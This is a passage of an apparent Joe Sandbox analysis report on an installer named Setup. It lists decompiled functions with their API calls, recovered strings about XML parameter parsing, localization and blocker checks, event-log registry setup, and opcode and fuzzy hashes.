                                                                                                                                                                    • Opcode Fuzzy Hash: 3a6e289e4a2b6cb07da387cc6ac425fb09583433129509e781cb0b19fbe09846
                                                                                                                                                                    • Instruction Fuzzy Hash: A2616B76900249EFCF10DFE8C885AEEBBB9BF05314F548569E021EB681DB349A05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D94509 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 162COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69D94510
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D94689
                                                                                                                                                                      • Part of subcall function 69DAFF21: _wcsnlen.LIBCMT ref: 69DAFF54
                                                                                                                                                                      • Part of subcall function 69DAFF21: _memcpy_s.LIBCMT ref: 69DAFF8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3H_prolog3__memcpy_s_wcsnlen
                                                                                                                                                                    • String ID: #(loc.$&amp;$&apos;$&gt;$&lt;$&quot;
                                                                                                                                                                    • API String ID: 1381108809-1774302600
                                                                                                                                                                    • Opcode ID: 39ab9f8a771676529ec9d53a3148e4f4010024666f13f5a2f80fa41b93bd4d2b
                                                                                                                                                                    • Instruction ID: e268c2a6c81e62207a2ecd31384f52005e4b157302a0208527612bbbdeeccf43
                                                                                                                                                                    • Opcode Fuzzy Hash: 39ab9f8a771676529ec9d53a3148e4f4010024666f13f5a2f80fa41b93bd4d2b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E514A79A00258DBCF00DFE8D984BEDB7B9BF48318F509175E810EB790DB359A148B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA51C0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DA51C7
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69DA51DC
                                                                                                                                                                      • Part of subcall function 69DC8859: SysStringByteLen.OLEAUT32(00000000), ref: 69DC8860
                                                                                                                                                                      • Part of subcall function 69DC8859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 69DC8869
                                                                                                                                                                      • Part of subcall function 69D7B00D: __EH_prolog3.LIBCMT ref: 69D7B014
                                                                                                                                                                      • Part of subcall function 69D7B00D: SysFreeString.OLEAUT32(?), ref: 69D7B044
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69DA5389
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A6DB: __EH_prolog3.LIBCMT ref: 69D7A6E2
                                                                                                                                                                      • Part of subcall function 69D7A6DB: SysFreeString.OLEAUT32(?), ref: 69D7A72B
                                                                                                                                                                      • Part of subcall function 69D7A7C3: __EH_prolog3.LIBCMT ref: 69D7A7CA
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DA5343
                                                                                                                                                                    Strings
                                                                                                                                                                    • BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID=", xrefs: 69DA52CB
                                                                                                                                                                    • //BlockIf[@ID], xrefs: 69DA5218
                                                                                                                                                                    • #(loc., xrefs: 69DA52B7
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69DA52FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3String$ByteFree$AllocException@8H_prolog3_catchInitializeThrowUninitialize
                                                                                                                                                                    • String ID: #(loc.$//BlockIf[@ID]$BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID="$ParameterInfo.xml
                                                                                                                                                                    • API String ID: 3727013976-3244902561
                                                                                                                                                                    • Opcode ID: 090338c6c8f52f85ce27d607e1ab24a8068dd7a918a9f806e40e2ce187d0a68d
                                                                                                                                                                    • Instruction ID: ff45a8557b73bf639a2bc334afe9ad058201fc0934ea0f94efda0dbfabb3c878
                                                                                                                                                                    • Opcode Fuzzy Hash: 090338c6c8f52f85ce27d607e1ab24a8068dd7a918a9f806e40e2ce187d0a68d
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E514075C00248EFCF00DBE8C984AEEBBB9AF55318F548179E115EB680CB349A49CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D850D5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 140comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69D850DC
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8380: __EH_prolog3.LIBCMT ref: 69DA8387
                                                                                                                                                                      • Part of subcall function 69D7388B: __EH_prolog3.LIBCMT ref: 69D73892
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69D8512A
                                                                                                                                                                    • CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,00000738,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D85148
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D85270
                                                                                                                                                                      • Part of subcall function 69D854B1: __EH_prolog3.LIBCMT ref: 69D854B8
                                                                                                                                                                      • Part of subcall function 69D854B1: __CxxThrowException@8.LIBCMT ref: 69D85540
                                                                                                                                                                    • CoUninitialize.OLE32(02602230,?,succeeded,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D851E6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$CreateH_prolog3_catchInitializeInstanceUninitialize
                                                                                                                                                                    • String ID: IronMan::LocalizedData::CreateLocalizedData$succeeded$threw exception
                                                                                                                                                                    • API String ID: 4097945976-352736096
                                                                                                                                                                    • Opcode ID: c25c5267d956640b772d00f001542645dc1f5b03001e26d3d29b7bd187519d2b
                                                                                                                                                                    • Instruction ID: 418fe14c1f405deaed6cc49360949829d1369f6f2aea7ef2ed8543c00341cc91
                                                                                                                                                                    • Opcode Fuzzy Hash: c25c5267d956640b772d00f001542645dc1f5b03001e26d3d29b7bd187519d2b
                                                                                                                                                                    • Instruction Fuzzy Hash: DB5137B4900249EFCF01CFA4C984EDEBBB9AF49318F508165F515EB651CB34AA45CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D777AF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00020019,?,?,69DA831D,00000000), ref: 69D777E8
                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00000000,00000000,00020006,00000000,?,00000000,?,69DA831D,00000000), ref: 69D77805
                                                                                                                                                                      • Part of subcall function 69D7787B: __EH_prolog3.LIBCMT ref: 69D77882
                                                                                                                                                                      • Part of subcall function 69D7787B: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,69D7781A,?,69DA831D,00000000), ref: 69D778B2
                                                                                                                                                                      • Part of subcall function 69D7787B: RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,69DA831D,00000000), ref: 69D778D8
                                                                                                                                                                      • Part of subcall function 69D7787B: RegCloseKey.ADVAPI32(?,?,69DA831D,00000000), ref: 69D778E4
                                                                                                                                                                      • Part of subcall function 69D7787B: GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D778F9
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,EventMessageFile,00000000,00000002,?,00000208,?,69DA831D,00000000), ref: 69D77836
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,TypesSupported,00000000,00000004,?,00000004,?,69DA831D,00000000), ref: 69D77859
                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,69DA831D,00000000), ref: 69D77861
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$CloseOpen$AttributesCreateFileH_prolog3Query
                                                                                                                                                                    • String ID: EventMessageFile$System\CurrentControlSet\Services\Eventlog\Application\VSSetup$TypesSupported
                                                                                                                                                                    • API String ID: 4021642227-369282485
                                                                                                                                                                    • Opcode ID: 9b0e3d7bc84d991c3c25a32cfa0f2bc20d579690c5f8420a11717fe36bf5eeab
                                                                                                                                                                    • Instruction ID: f4fb9a8adbdace70cf2fa96811b9404462d43b0094ca5be7842d1db3a9cb2c72
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0e3d7bc84d991c3c25a32cfa0f2bc20d579690c5f8420a11717fe36bf5eeab
                                                                                                                                                                    • Instruction Fuzzy Hash: 86118B71A4022CBBEB309B168C8DFEBBF6DEB52755F4044A5B519E6180C6B09E44CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698FA311 Relevance: 13.7, APIs: 9, Instructions: 196COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStartupInfoW.KERNEL32(698D14A0,698F91D6), ref: 698FA31E
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 698FA32A
                                                                                                                                                                      • Part of subcall function 698F9F70: Sleep.KERNEL32(00000000,?,698F91D6,?), ref: 698F9F98
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 698FA3CA
                                                                                                                                                                    • GetFileType.KERNEL32(74C08559,00000001,698F91D6), ref: 698FA451
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 591920814-0
                                                                                                                                                                    • Opcode ID: 3e10e65558a86e8843bb6ae3ca79d24cdd2190d04728235e8f685bc1e3fe3fbb
                                                                                                                                                                    • Instruction ID: 92a5df93b7c55bcad93c19a6618627a42d651ddf35aecc79d122c4e05106de4c
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e10e65558a86e8843bb6ae3ca79d24cdd2190d04728235e8f685bc1e3fe3fbb
                                                                                                                                                                    • Instruction Fuzzy Hash: EA6116729087418FDB00CF68C889B2977A4BF6A3B4F14AA6CD566DB2E1F730D406CB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DCDB02 Relevance: 13.7, APIs: 9, Instructions: 196COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,69DCC0C9), ref: 69DCDB0F
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 69DCDB1B
                                                                                                                                                                      • Part of subcall function 69DCD761: Sleep.KERNEL32(00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCD789
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 69DCDBBB
                                                                                                                                                                    • GetFileType.KERNEL32(?,00000001,69DCC0C9), ref: 69DCDC42
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 591920814-0
                                                                                                                                                                    • Opcode ID: 76176b82c7d0527400104c30ead97d746782aade72adf5b19150a34565bd5886
                                                                                                                                                                    • Instruction ID: 93c5caefb35f938745a8effe79324f845774a0a184c238f4deb142f3a1c9a00b
                                                                                                                                                                    • Opcode Fuzzy Hash: 76176b82c7d0527400104c30ead97d746782aade72adf5b19150a34565bd5886
                                                                                                                                                                    • Instruction Fuzzy Hash: 12610071984741CFE7008F68CE88B197BA8BF4A325F24877AC5A6CB6E1E770D401CB12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7B31F Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 247COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7B326
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7B25F: __EH_prolog3.LIBCMT ref: 69D7B266
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7B5A8
                                                                                                                                                                    Strings
                                                                                                                                                                    • No DisabledCommandLineSwitches block was specified, xrefs: 69D7B5C8
                                                                                                                                                                    • Disabled CommandLineSwitch added: , xrefs: 69D7B406, 69D7B4C5
                                                                                                                                                                    • The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit, xrefs: 69D7B546
                                                                                                                                                                    • DisabledCommandLineSwitches, xrefs: 69D7B353
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D7B554
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: Disabled CommandLineSwitch added: $DisabledCommandLineSwitches$No DisabledCommandLineSwitches block was specified$ParameterInfo.xml$The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit
                                                                                                                                                                    • API String ID: 2489616738-1449725936
                                                                                                                                                                    • Opcode ID: 100ce7229c6608dd1e608ca0434824a9f682a4c084763fefd019507f7ac60f23
                                                                                                                                                                    • Instruction ID: 99cdbe9d8f81583e0d7f851d14c6c3996646d6610e3261f52366b987c49c6342
                                                                                                                                                                    • Opcode Fuzzy Hash: 100ce7229c6608dd1e608ca0434824a9f682a4c084763fefd019507f7ac60f23
                                                                                                                                                                    • Instruction Fuzzy Hash: DAA17A71900249DFCF01CFA8C984AAEBBB9BF95318F2485A9E111EB790C735DE45CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D849CE Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 231COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D849D5
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D84A3C
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D795C1: __EH_prolog3.LIBCMT ref: 69D795C8
                                                                                                                                                                      • Part of subcall function 69D795C1: VariantInit.OLEAUT32(?), ref: 69D795DB
                                                                                                                                                                      • Part of subcall function 69D795C1: SysFreeString.OLEAUT32(?), ref: 69D7960E
                                                                                                                                                                      • Part of subcall function 69D795C1: VariantClear.OLEAUT32(00000008), ref: 69D7962E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Variant$ClearDispatcherExceptionException@8FreeInitStringThrowUser
                                                                                                                                                                    • String ID: Language$LocalizedText$Text$Unable to find Language element for LangID="%d" in localized data$W
                                                                                                                                                                    • API String ID: 452683132-1012890799
                                                                                                                                                                    • Opcode ID: 324e64a97586b027764cad4cd90477bf38f71d054f4e3bd3ef27b5d45dd5341d
                                                                                                                                                                    • Instruction ID: f4a79e2010069dd44538335da9a272612f18e881e25867098daccafcc3f912c2
                                                                                                                                                                    • Opcode Fuzzy Hash: 324e64a97586b027764cad4cd90477bf38f71d054f4e3bd3ef27b5d45dd5341d
                                                                                                                                                                    • Instruction Fuzzy Hash: C2914DB1900259EFCF01CFA8C984ADEBBB9BF49718F148569F414EB741C735AA05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D99048 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 175COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D82E48: __EH_prolog3.LIBCMT ref: 69D82E4F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D991B1
                                                                                                                                                                    Strings
                                                                                                                                                                    • : SuccessBlockers evaluated to true., xrefs: 69D991E8
                                                                                                                                                                    • Checking for global blockers, xrefs: 69D990A8
                                                                                                                                                                    • : StopBlockers evaluated to true., xrefs: 69D99209
                                                                                                                                                                    • Global Block Checks, xrefs: 69D99087, 69D990B7
                                                                                                                                                                    • no blocking conditions found, xrefs: 69D99078
                                                                                                                                                                    • : WarnBlockers evaluated to true., xrefs: 69D9921D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: no blocking conditions found$: StopBlockers evaluated to true.$: SuccessBlockers evaluated to true.$: WarnBlockers evaluated to true.$Checking for global blockers$Global Block Checks
                                                                                                                                                                    • API String ID: 2489616738-2937627051
                                                                                                                                                                    • Opcode ID: df5624c69565f3a4421daf0a9767aa03eaa7366bdbd4807c6a750123e7a0627c
                                                                                                                                                                    • Instruction ID: c6c5f2be570cf6465b8459ea0145f0960eade95789565843d0d4c8cf8ed8b0ff
                                                                                                                                                                    • Opcode Fuzzy Hash: df5624c69565f3a4421daf0a9767aa03eaa7366bdbd4807c6a750123e7a0627c
                                                                                                                                                                    • Instruction Fuzzy Hash: 977145B1408345AFC710DF59C984A5BFBE9FF89708F804A2EF58583A50D371E949CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D838A1 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D838A8
                                                                                                                                                                      • Part of subcall function 69D78D44: __EH_prolog3.LIBCMT ref: 69D78D4B
                                                                                                                                                                      • Part of subcall function 69D83480: __EH_prolog3.LIBCMT ref: 69D83487
                                                                                                                                                                    Strings
                                                                                                                                                                    • Create CustomErrorRetry object, xrefs: 69D8399C
                                                                                                                                                                    • Create CustomErrorMappingBase object, xrefs: 69D83A51
                                                                                                                                                                    • schema validation failure: More than 1 CustomError Mapping block defined., xrefs: 69D838D1
                                                                                                                                                                    • The mapping element defined: , xrefs: 69D83951
                                                                                                                                                                    • Retry, xrefs: 69D83983, 69D839B9
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D838E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Create CustomErrorMappingBase object$Create CustomErrorRetry object$ParameterInfo.xml$Retry$The mapping element defined: $schema validation failure: More than 1 CustomError Mapping block defined.
                                                                                                                                                                    • API String ID: 431132790-1753673958
                                                                                                                                                                    • Opcode ID: 42fbec0faa2823f05d125229b4dd1c21fb7b0abeab0b7b19e86a0cd4d79d373c
                                                                                                                                                                    • Instruction ID: a9565b6097fb3cd792ba5d9b61b05f27626beb78124b909fcdd51c7f729731dc
